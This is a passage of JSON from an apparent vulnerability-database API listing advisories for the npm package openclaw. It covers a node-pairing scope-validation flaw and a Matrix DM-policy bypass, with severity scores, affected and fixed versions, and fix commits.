"VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-384t-z1h8-pfft" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-8z7r-a8dv-eueb" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9jjv-aa8k-rke1" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9pj9-7b12-jbea" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-brfj-4shr-qkgc" }, { "vulnerability": "VCID-bumq-54sb-6ua7" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cvxu-rdbu-abd2" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d3qp-5wm9-aqfp" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-djqx-bwuu-4uc1" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-gvam-2net-8kc5" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hkqd-6khg-m3hj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-j92n-5217-9bhj" }, { "vulnerability": "VCID-j96c-kau3-7fag" }, { "vulnerability": "VCID-jbwa-scg3-efeq" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jhah-j2td-t3dp" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-jtxm-z4vv-cqg7" }, { "vulnerability": "VCID-k3up-1vdf-2uh9" }, { "vulnerability": "VCID-k52b-966p-ybbk" }, { "vulnerability": "VCID-k5da-7tht-w3bs" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mggy-bv5s-5uax" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nfva-pukn-uqch" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pa1f-qzsh-efa9" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pc9z-x5wk-8ue7" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-qjvc-etb4-qbfv" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-r9y1-z2ax-z3e2" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-te8f-snty-j7hh" }, { "vulnerability": "VCID-tf28-1z2z-5yfn" }, { "vulnerability": "VCID-tk9h-nqrz-uugp" }, { "vulnerability": "VCID-u1ru-vdfp-x3hu" }, { "vulnerability": "VCID-u6hw-ffpj-4yd9" }, { "vulnerability": "VCID-u9cw-crg5-1kbs" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v1bp-hw9a-yffz" }, { "vulnerability": "VCID-v91b-1nmx-ckcx" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vm8g-hrvu-quhm" }, { "vulnerability": "VCID-vqrj-z6tx-rff2" }, { "vulnerability": "VCID-vtqt-bgz7-yub6" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2rd-2j4p-gfgw" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wkye-je9r-1fba" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wut7-y72y-9ucb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xpr3-hg3h-z3bz" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zac2-wjyt-27af" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zf3q-78js-k7ce" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22" } ], "aliases": [ "GHSA-ppwq-6v66-5m6j" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-twsq-vfde-4fbf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89807?format=api", "vulnerability_id": "VCID-u1ru-vdfp-x3hu", "summary": "OpenClaw: node.pair.approve missing callerScopes validation allows low-privilege operator to approve malicious nodes\n## Summary\n\nThe node pairing approval path did not consistently enforce that the approving caller already held every scope requested by the node.\n\n## Impact\n\nA lower-privileged operator could approve a pending node request for broader scopes and extend privileges onto the paired node.\n\n## Affected Component\n\n`src/infra/node-pairing.ts, src/gateway/server-methods/nodes.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4d7cc6bb4f` (`gateway: restrict node pairing approvals`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33577", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02402", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00013", "scoring_system": "epss", "scoring_elements": "0.02398", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.03525", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33577" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33577", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33577" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "4.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve" }, { "reference_url": "https://github.com/advisories/GHSA-2x4x-cc5g-qmmg", "reference_id": "GHSA-2x4x-cc5g-qmmg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2x4x-cc5g-qmmg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-33577", "GHSA-2x4x-cc5g-qmmg" ], "risk_score": 4.4, "exploitability": "0.5", "weighted_severity": "8.8", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-u1ru-vdfp-x3hu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90842?format=api", "vulnerability_id": "VCID-u6hw-ffpj-4yd9", "summary": "OpenClaw: Matrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n## Summary\n\nMatrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMatrix verification notices previously bypassed DM access checks and could reply to peers that were unpaired or otherwise outside the allowed DM policy. Commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2` gates verification notices on DM access before sending.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`.\n\n## Fix Commit(s)\n\n- `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35647", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12423", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12387", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12424", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35647" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": 